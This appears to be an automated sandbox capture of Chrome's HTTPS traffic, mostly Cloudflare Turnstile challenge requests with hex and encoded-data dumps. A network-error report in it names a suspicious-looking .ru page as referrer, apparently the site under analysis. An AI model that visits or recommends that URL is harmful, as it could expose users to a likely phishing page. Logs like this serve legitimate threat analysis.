                                                                                                        2024-10-04 13:11:41 UTC2727OUTData Raw: 76 5f 38 63 64 35 36 62 34 62 63 61 35 30 34 32 33 61 3d 41 32 24 6a 6b 6a 58 6a 32 6a 4b 6a 7a 69 51 70 69 51 53 6a 69 46 43 6e 35 54 69 25 32 62 51 35 51 62 5a 46 57 59 79 51 64 77 4f 51 79 79 69 74 51 61 51 39 46 2b 6e 38 79 4e 2b 51 6c 65 6e 4e 6e 4c 33 36 51 45 6a 57 77 51 34 6a 43 39 4c 50 77 51 51 54 51 69 65 6a 4e 2b 51 43 4b 79 51 2b 69 42 24 4e 30 51 75 53 62 5a 68 4b 75 62 69 4d 51 6f 51 48 58 78 6c 4b 4a 6a 43 4d 32 51 4a 38 75 47 6b 62 58 74 46 69 59 62 4b 6a 2b 38 69 77 51 2b 24 51 59 4b 5a 24 7a 6b 31 47 77 64 32 6d 62 67 32 74 51 6c 73 5a 51 48 24 48 69 41 6e 74 51 4e 6c 4d 51 47 64 6c 51 69 31 67 62 33 51 51 4a 6a 69 67 42 43 65 58 41 33 4d 4d 75 51 43 30 51 2b 32 51 48 2d 46 51 37 42 68 53 51 47 4d 51 35 6a 46 51 4c 2d 52 67 78 42 52 62
                                                                                                        Data Ascii: v_8cd56b4bca50423a=A2$jkjXj2jKjziQpiQSjiFCn5Ti%2bQ5QbZFWYyQdwOQyyitQaQ9F+n8yN+QlenNnL36QEjWwQ4jC9LPwQQTQiejN+QCKyQ+iB$N0QuSbZhKubiMQoQHXxlKJjCM2QJ8uGkbXtFiYbKj+8iwQ+$QYKZ$zk1Gwd2mbg2tQlsZQH$HiAntQNlMQGdlQi1gb3QQJjigBCeXA3MMuQC0Q+2QH-FQ7BhSQGMQ5jFQL-RgxBRb
                                                                                                        2024-10-04 13:11:41 UTC717INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:41 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 152304
                                                                                                        Connection: close
                                                                                                        cf-chl-gen: ZKHOIkR11FwKYr1IdCr+a93Mv9v0+0l1k+tK1XcqVkUIISfW7JnVQKCBzXYG+YgQQc96D8tBzuCe7gECEBDz65Rcq2Dc0mrRX40N2aaYonKSFNW533NYAHmCR6VE7UVVvD7gUAIOI+YecQhYLXLXmzgg+YOAKrsgQhv0wgxXsj84/Q2V2FOG0iCZ6ecHxDKNl2J3VDn2fyyo+Gykt08myd08tcrgnLGWFoTlDIyzAz/m3Fp6+CyOYhWXA6G1DgnMtivZ8g9xTqOYEZOQKpUcvSd3F2XqVeobd9Fe5teyP8WK9+xTYvLj1oLIL0xXz6ezxqmtmIN1qjTNrlsar/77M2cEW7NRAtKdMSg+uzw+6rbUILKlEA4mXL1faGo+uQiWX95Q1Jsw752B3jdqLiKnlGzxgXZ3ctldm7hI2MWvCWISFwhhy2I8Dyjkq4S9ABbcQtZATQ+T3rlIFPKu4WStkoRMwSCmNgA/ePmrXrV8ZD4TLuA=$KYLrtZznfymjaTRx
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b562d6ec47c-EWR
                                                                                                        2024-10-04 13:11:41 UTC652INData Raw: 59 59 43 43 6a 6c 6d 49 58 56 2b 43 64 34 64 55 59 6f 4e 76 54 70 6d 58 6c 35 75 65 57 47 4e 64 6f 61 52 77 58 32 69 57 6d 4b 52 70 68 4b 53 76 69 34 79 6e 6a 32 2b 72 70 35 47 73 64 59 75 72 64 62 65 70 69 4b 75 77 77 4c 47 46 6e 4c 61 5a 6d 34 61 69 75 4c 32 4a 70 49 65 37 72 4e 43 79 7a 36 36 67 6b 4a 69 77 6d 64 4f 64 74 4e 53 58 6f 5a 69 75 31 62 2b 2f 6f 4d 4f 6a 33 5a 33 44 7a 61 72 64 34 4b 6e 72 79 37 7a 67 39 65 7a 6a 74 4f 6e 77 35 37 72 55 2f 65 47 2b 37 38 36 37 33 2b 44 5a 34 38 54 5a 33 4d 58 34 37 4f 44 4a 2f 4d 7a 64 42 66 33 74 30 63 6f 50 44 78 76 74 37 66 7a 39 46 79 48 35 46 42 6b 64 33 65 41 56 38 2b 51 44 49 65 66 75 37 53 6a 76 43 50 49 55 38 4f 67 54 39 52 45 7a 2b 66 6b 56 43 77 41 75 46 52 77 41 51 41 46 43 51 78 73 30 50 41 67
                                                                                                        Data Ascii: YYCCjlmIXV+Cd4dUYoNvTpmXl5ueWGNdoaRwX2iWmKRphKSvi4ynj2+rp5GsdYurdbepiKuwwLGFnLaZm4aiuL2JpIe7rNCyz66gkJiwmdOdtNSXoZiu1b+/oMOj3Z3Dzard4Knry7zg9ezjtOnw57rU/eG+78673+DZ48TZ3MX47ODJ/MzdBf3t0coPDxvt7fz9FyH5FBkd3eAV8+QDIefu7SjvCPIU8OgT9REz+fkVCwAuFRwAQAFCQxs0PAg
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 52 53 39 59 63 6d 78 79 65 6d 6c 52 4f 46 4e 4e 65 6e 31 31 64 6d 46 62 52 54 31 66 53 46 61 43 57 55 39 77 53 6f 74 4f 55 31 42 32 62 57 79 59 6b 48 52 6e 63 33 4e 76 6f 6e 32 4d 58 36 61 41 66 31 74 69 67 6d 4f 72 61 57 57 4c 73 59 6d 7a 6a 5a 47 50 73 49 6d 59 74 61 31 7a 68 34 69 63 73 37 75 77 66 33 36 74 77 48 32 65 70 4d 6d 58 6c 6f 6e 44 71 63 62 53 6b 6f 37 52 6b 35 62 54 6f 4c 65 57 71 4e 57 78 6e 70 62 4a 6c 38 43 62 72 64 79 59 35 37 54 68 32 4b 66 6c 75 4b 72 71 37 2f 44 54 35 75 58 32 31 38 54 68 2b 74 76 4b 7a 2f 37 66 7a 62 34 44 34 39 48 74 42 2b 66 54 32 77 76 72 31 73 6f 50 37 39 6f 4b 45 2f 50 66 30 68 66 33 34 77 49 62 2b 2b 58 77 2f 52 76 75 46 2b 76 65 33 78 33 79 47 78 37 6c 2f 4f 50 7a 43 41 2f 67 36 7a 49 61 2b 75 38 32 48 68 6a
                                                                                                        Data Ascii: RS9YcmxyemlROFNNen11dmFbRT1fSFaCWU9wSotOU1B2bWyYkHRnc3Nvon2MX6aAf1tigmOraWWLsYmzjZGPsImYta1zh4ics7uwf36twH2epMmXlonDqcbSko7Rk5bToLeWqNWxnpbJl8CbrdyY57Th2KfluKrq7/DT5uX218Th+tvKz/7fzb4D49HtB+fT2wvr1soP79oKE/Pf0hf34wIb++Xw/RvuF+ve3x3yGx7l/OPzCA/g6zIa+u82Hhj
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 46 49 34 53 6c 64 67 55 45 35 6c 58 6b 53 42 61 34 5a 59 50 33 74 37 63 46 39 6a 5a 30 74 6e 59 32 64 56 62 4a 53 5a 54 6d 2b 57 5a 31 6c 78 6e 34 79 4f 6d 6f 64 5a 59 48 70 71 68 61 47 68 72 47 47 52 61 49 64 2b 72 4a 56 73 69 4b 2b 45 64 49 69 31 73 49 32 71 73 37 32 33 76 72 4f 6d 75 35 79 2f 74 4d 53 39 68 38 32 41 6f 72 79 67 70 61 69 54 73 39 66 55 7a 35 4b 57 6a 64 48 54 71 72 6d 5a 73 71 4c 69 6e 71 53 64 75 74 69 6d 73 70 32 36 76 75 6a 58 7a 37 33 72 32 39 4c 73 35 2b 44 73 74 4f 32 33 79 63 2f 2b 33 65 44 78 32 2f 57 36 77 67 4d 44 39 74 50 47 79 63 77 4e 37 77 45 43 45 2f 50 66 30 68 66 33 34 77 49 62 2b 2b 58 77 2f 52 76 75 46 2b 76 65 33 78 33 79 47 78 37 6c 2f 4f 4d 6f 43 51 38 72 2f 50 41 62 49 53 50 71 48 78 67 78 43 53 49 50 4f 53 33 33
                                                                                                        Data Ascii: FI4SldgUE5lXkSBa4ZYP3t7cF9jZ0tnY2dVbJSZTm+WZ1lxn4yOmodZYHpqhaGhrGGRaId+rJVsiK+EdIi1sI2qs723vrOmu5y/tMS9h82AorygpaiTs9fUz5KWjdHTqrmZsqLinqSdutimsp26vujXz73r29Ls5+DstO23yc/+3eDx2/W6wgMD9tPGycwN7wECE/Pf0hf34wIb++Xw/RvuF+ve3x3yGx7l/OMoCQ8r/PAbISPqHxgxCSIPOS33
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 64 65 61 46 4e 5a 68 34 4f 47 65 49 35 59 67 49 31 61 55 32 57 45 6c 34 52 35 59 33 70 76 63 49 2b 50 6b 56 61 63 57 34 4e 64 65 6c 2b 48 68 57 6d 59 6c 6f 75 73 6e 6f 35 71 73 4c 4b 4a 67 34 5a 76 6f 70 56 35 65 61 61 61 68 6e 57 65 65 73 42 37 72 70 2b 38 65 4c 35 2f 79 62 69 48 78 70 6e 4d 79 62 6d 61 6a 49 7a 52 70 71 4b 69 71 38 57 57 6f 38 61 37 73 73 43 76 7a 38 36 7a 33 70 36 69 73 61 4c 54 77 37 4f 65 33 38 43 6c 72 75 6e 69 72 4e 50 46 79 39 61 76 73 2f 47 34 79 64 33 78 30 74 48 50 31 67 48 30 76 2f 51 49 43 74 2f 48 42 4e 2f 36 37 51 66 69 32 77 6b 4a 44 67 62 51 44 42 62 31 7a 50 4d 61 35 64 77 65 46 66 37 36 49 50 7a 37 42 65 51 46 38 52 4d 66 4a 52 6b 44 4a 52 30 6a 4a 79 41 56 43 6a 67 31 4b 67 4d 45 46 42 6f 66 43 43 38 50 49 7a 30 38 48
                                                                                                        Data Ascii: deaFNZh4OGeI5YgI1aU2WEl4R5Y3pvcI+PkVacW4Ndel+HhWmYlousno5qsLKJg4ZvopV5eaaahnWeesB7rp+8eL5/ybiHxpnMybmajIzRpqKiq8WWo8a7ssCvz86z3p6isaLTw7Oe38ClrunirNPFy9avs/G4yd3x0tHP1gH0v/QICt/HBN/67Qfi2wkJDgbQDBb1zPMa5dweFf76IPz7BeQF8RMfJRkDJR0jJyAVCjg1KgMEFBofCC8PIz08H
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 35 61 49 70 4f 55 45 74 4a 55 49 42 51 6b 46 39 55 69 35 42 79 6d 46 6c 75 5a 33 4f 57 6f 56 31 78 6d 58 61 41 6d 47 53 57 6d 58 2b 69 6f 71 57 4f 6d 61 4f 70 73 5a 31 2b 68 4a 6c 78 69 71 61 58 62 37 52 2f 71 37 65 34 67 36 2f 44 76 49 65 7a 71 4c 36 35 77 71 76 4a 69 39 43 72 6f 63 54 45 6b 70 36 58 70 71 62 57 79 71 32 7a 70 37 50 67 6b 39 2b 61 32 62 36 64 33 75 44 6f 31 72 62 47 75 38 47 76 76 2b 7a 6f 33 39 4c 53 34 75 50 57 77 76 54 61 32 76 54 30 31 73 33 56 41 63 2b 39 76 66 58 68 78 76 50 34 33 64 62 56 2b 75 58 72 36 74 48 73 42 51 6a 78 34 64 48 79 30 42 45 65 32 68 50 6e 37 77 76 5a 34 50 7a 66 33 65 55 6c 46 79 50 6d 43 53 44 6e 45 52 6f 53 37 79 45 74 45 77 51 75 45 41 34 59 4f 54 45 64 2f 69 78 43 47 43 38 39 50 69 59 50 52 44 55 49 4e 53
                                                                                                        Data Ascii: 5aIpOUEtJUIBQkF9Ui5BymFluZ3OWoV1xmXaAmGSWmX+ioqWOmaOpsZ1+hJlxiqaXb7R/q7e4g6/DvIezqL65wqvJi9CrocTEkp6XpqbWyq2zp7Pgk9+a2b6d3uDo1rbGu8Gvv+zo39LS4uPWwvTa2vT01s3VAc+9vfXhxvP43dbV+uXr6tHsBQjx4dHy0BEe2hPn7wvZ4Pzf3eUlFyPmCSDnERoS7yEtEwQuEA4YOTEd/ixCGC89PiYPRDUINS
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 66 5a 42 73 6c 6c 46 4b 6d 47 74 78 64 70 4a 38 6c 35 35 71 6f 6d 4e 36 6c 70 74 6c 6b 46 75 6c 70 57 57 67 70 70 32 43 73 49 65 70 69 34 4f 67 74 62 64 35 75 61 69 34 65 59 36 37 75 58 31 39 77 5a 2b 50 78 63 4b 36 65 38 57 72 79 59 69 66 76 59 71 6a 6b 71 7a 53 7a 64 61 79 6f 4d 72 59 73 37 6a 61 7a 70 58 68 32 5a 2f 4e 31 73 4c 57 78 74 54 67 75 38 50 45 32 2b 62 75 30 63 6e 7a 37 2b 6e 47 78 75 4b 79 37 65 50 50 75 72 7a 31 31 62 6a 4e 41 39 69 2f 32 50 6a 6e 34 39 48 38 44 66 55 4c 36 50 76 76 33 4e 41 41 42 67 4c 70 35 2b 72 55 47 51 72 7a 39 68 6b 41 32 52 6b 53 44 2f 49 55 4a 43 45 70 34 53 76 70 37 43 73 74 44 79 72 38 37 77 72 72 39 66 4d 4e 46 44 54 78 4e 42 49 48 4c 69 68 42 47 76 6a 31 4f 6a 31 48 49 51 49 6a 42 30 41 6f 4a 41 55 6f 47 30 77
                                                                                                        Data Ascii: fZBsllFKmGtxdpJ8l55qomN6lptlkFulpWWgpp2CsIepi4Ogtbd5uai4eY67uX19wZ+PxcK6e8WryYifvYqjkqzSzdayoMrYs7jazpXh2Z/N1sLWxtTgu8PE2+bu0cnz7+nGxuKy7ePPurz11bjNA9i/2Pjn49H8DfUL6Pvv3NAABgLp5+rUGQrz9hkA2RkSD/IUJCEp4Svp7CstDyr87wrr9fMNFDTxNBIHLihBGvj1Oj1HIQIjB0AoJAUoG0w
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 46 4e 35 57 59 6c 58 62 4a 53 4c 57 35 5a 57 6a 31 2b 62 66 70 39 32 67 71 47 4b 61 71 4b 69 6a 59 47 69 67 34 75 4f 73 59 71 31 71 72 68 30 64 33 43 33 76 6f 72 44 67 4a 32 7a 70 4a 47 30 78 36 72 45 76 4d 75 58 76 5a 71 78 68 4a 4b 67 76 74 57 79 30 36 69 6a 71 72 79 56 73 39 71 35 32 38 71 36 31 71 43 2f 76 39 33 64 79 73 54 45 32 62 72 58 77 62 76 75 36 37 48 50 72 4f 50 31 74 75 37 44 79 39 51 41 78 2f 37 59 37 73 30 44 31 77 6a 61 30 4e 61 38 33 51 37 4c 44 65 67 4f 34 68 50 76 34 41 2f 65 39 39 66 6c 46 78 59 46 36 2b 33 6e 44 77 49 68 2b 42 76 76 34 75 62 39 4b 51 77 64 4c 69 38 51 2b 69 6f 7a 46 41 44 79 4e 78 67 45 49 78 6f 33 44 41 30 49 2b 76 77 57 51 53 51 7a 4e 78 51 37 4b 45 6b 62 42 41 73 2f 4a 68 78 4c 44 30 51 7a 54 6c 59 49 54 6c 51 5a
                                                                                                        Data Ascii: FN5WYlXbJSLW5ZWj1+bfp92gqGKaqKijYGig4uOsYq1qrh0d3C3vorDgJ2zpJG0x6rEvMuXvZqxhJKgvtWy06ijqryVs9q528q61qC/v93dysTE2brXwbvu67HPrOP1tu7Dy9QAx/7Y7s0D1wja0Na83Q7LDegO4hPv4A/e99flFxYF6+3nDwIh+Bvv4ub9KQwdLi8Q+iozFADyNxgEIxo3DA0I+vwWQSQzNxQ7KEkbBAs/JhxLD0QzTlYITlQZ
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 6d 42 63 6c 32 68 58 48 71 67 68 47 6d 58 66 6f 61 57 66 49 4b 6a 6b 4b 35 76 68 71 71 32 73 6f 4b 34 65 6f 61 58 73 5a 46 2f 65 49 47 34 6f 71 4b 6d 67 4b 66 4a 79 4a 6a 4b 75 73 6d 65 75 4a 75 4c 70 38 2f 41 6a 4e 53 32 70 63 69 4d 79 64 69 56 6d 72 6d 65 72 64 65 79 31 4e 75 68 74 37 4c 58 31 63 43 6d 37 4c 37 4b 75 4f 7a 74 31 4f 62 78 38 73 6e 70 36 2f 44 4f 78 2b 66 30 32 63 6e 41 2b 4e 50 4f 38 2f 48 63 76 73 59 48 30 39 76 6f 42 4d 6f 4e 7a 77 44 51 78 75 73 4b 30 2b 54 33 30 76 6e 59 39 4e 41 5a 44 2b 6f 69 34 52 49 42 34 4f 58 2b 2f 76 76 37 36 41 55 6a 47 65 6f 78 49 78 54 75 49 65 30 68 41 79 77 38 4a 78 77 66 39 69 6f 56 48 54 41 37 50 52 38 63 52 43 46 46 53 67 7a 2b 54 30 59 5a 4a 67 78 49 45 53 77 71 43 56 49 68 49 31 6c 55 47 68 34 32 54
                                                                                                        Data Ascii: mBcl2hXHqghGmXfoaWfIKjkK5vhqq2soK4eoaXsZF/eIG4oqKmgKfJyJjKusmeuJuLp8/AjNS2pciMydiVmrmerdey1Nuht7LX1cCm7L7KuOzt1Obx8snp6/DOx+f02cnA+NPO8/HcvsYH09voBMoNzwDQxusK0+T30vnY9NAZD+oi4RIB4OX+/vv76AUjGeoxIxTuIe0hAyw8Jxwf9ioVHTA7PR8cRCFFSgz+T0YZJgxIESwqCVIhI1lUGh42T
                                                                                                        2024-10-04 13:11:41 UTC1369INData Raw: 52 70 61 4a 6b 58 5a 69 49 6d 57 75 73 6a 4b 56 7a 66 33 4b 74 66 34 65 52 69 33 57 34 70 71 39 35 72 5a 75 2f 76 4b 32 61 75 35 43 34 6c 35 4b 46 68 5a 71 2f 75 71 44 45 30 62 76 4c 6e 74 4b 2f 74 36 4c 4c 78 4e 47 32 6d 4d 2f 54 6f 64 76 44 6e 5a 7a 5a 6f 64 72 56 6f 73 6d 6f 75 74 37 73 35 4f 50 42 30 73 37 56 39 2f 54 55 34 38 54 32 7a 72 6a 31 37 64 66 57 37 65 76 53 42 41 44 6e 77 76 6a 31 33 50 6a 6d 36 41 6f 45 42 75 30 47 39 41 66 54 34 4f 54 32 31 41 6a 38 36 75 76 6f 30 76 72 64 38 68 58 33 48 68 33 68 39 68 4d 4a 4a 76 6a 72 42 77 50 6a 4b 7a 50 75 42 2b 30 77 44 67 4d 35 42 78 63 49 45 76 45 51 4d 68 4d 30 45 7a 6f 50 4e 79 51 36 4f 44 74 4c 52 67 64 52 50 55 30 6a 45 45 6f 6c 55 78 4d 4c 52 68 52 63 4f 44 39 53 56 32 45 39 57 54 41 77 4d 54
                                                                                                        Data Ascii: RpaJkXZiImWusjKVzf3Ktf4eRi3W4pq95rZu/vK2au5C4l5KFhZq/uqDE0bvLntK/t6LLxNG2mM/TodvDnZzZodrVosmout7s5OPB0s7V9/TU48T2zrj17dfW7evSBADnwvj13Pjm6AoEBu0G9AfT4OT21Aj86uvo0vrd8hX3Hh3h9hMJJvjrBwPjKzPuB+0wDgM5BxcIEvEQMhM0EzoPNyQ6ODtLRgdRPU0jEEolUxMLRhRcOD9SV2E9WTAwMT


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        39192.168.2.165264835.190.80.14431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:42 UTC476OUTPOST /report/v4?s=v8w%2Bvwhx1y4kU1skquzdEMq2sWfTrENkggTrFExr4oHFIp94bo7K1Fl9qSv2s93b4wEwr7AKizzf%2Bf7I8UKOO4IaN1DpaaRW9mxCk2rnDAtZ3fFQb01x2H%2FDRaFXMg%3D%3D HTTP/1.1
                                                                                                        Host: a.nel.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 441
                                                                                                        Content-Type: application/reports+json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:42 UTC441OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 39 77 65 74 6a 64 61 2e 6e 69 61 76 65 72 65 69 6e 68 6f 2e 72 75 2f 51 54 6e 41 72 74 34 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d
                                                                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":111,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://9wetjda.niavereinho.ru/QTnArt4/","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"http.error"},"type":"network-
                                                                                                        2024-10-04 13:11:42 UTC168INHTTP/1.1 200 OK
                                                                                                        Content-Length: 0
                                                                                                        date: Fri, 04 Oct 2024 13:11:42 GMT
                                                                                                        Via: 1.1 google
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        40192.168.2.1652649104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:42 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/868862447:1728044727:Gz7Dl8mZdZr0DP9Q4Zh7hrsdOMaLwCsED9HAlqQ_3D4/8cd56b4bca50423a/c1fc4ecc24bba50 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:42 UTC349INHTTP/1.1 404 Not Found
                                                                                                        Date: Fri, 04 Oct 2024 13:11:42 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cf-chl-out: RC73Fj5dU4RRytac4KBjgBIjsjaUe3o8KtQ=$MujRfMV4ZMV961a7
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b5c6c3f7c93-EWR
                                                                                                        2024-10-04 13:11:42 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        41192.168.2.1652650104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:43 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8cd56b4bca50423a/1728047501850/dKqrmOItVOoeN4w HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:43 UTC200INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:43 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b5f3f442395-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-10-04 13:11:43 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 41 00 00 00 1c 08 02 00 00 00 b1 85 45 3b 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRAE;IDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        42192.168.2.1652651104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:43 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8cd56b4bca50423a/1728047501850/dKqrmOItVOoeN4w HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:43 UTC170INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:43 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b6309b242cb-EWR
                                                                                                        2024-10-04 13:11:43 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 41 00 00 00 1c 08 02 00 00 00 b1 85 45 3b 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRAE;IDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        43192.168.2.1652652104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:44 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8cd56b4bca50423a/1728047501852/f96dfdf1476db5c1c12c75ca405306e993064662438dbaa062225451bc879712/HnD5w_lm3dPB86M HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: max-age=0
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:44 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                        Date: Fri, 04 Oct 2024 13:11:44 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 1
                                                                                                        Connection: close
                                                                                                        2024-10-04 13:11:44 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 2d 57 33 39 38 55 64 74 74 63 48 42 4c 48 58 4b 51 46 4d 47 36 5a 4d 47 52 6d 4a 44 6a 62 71 67 59 69 4a 55 55 62 79 48 6c 78 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
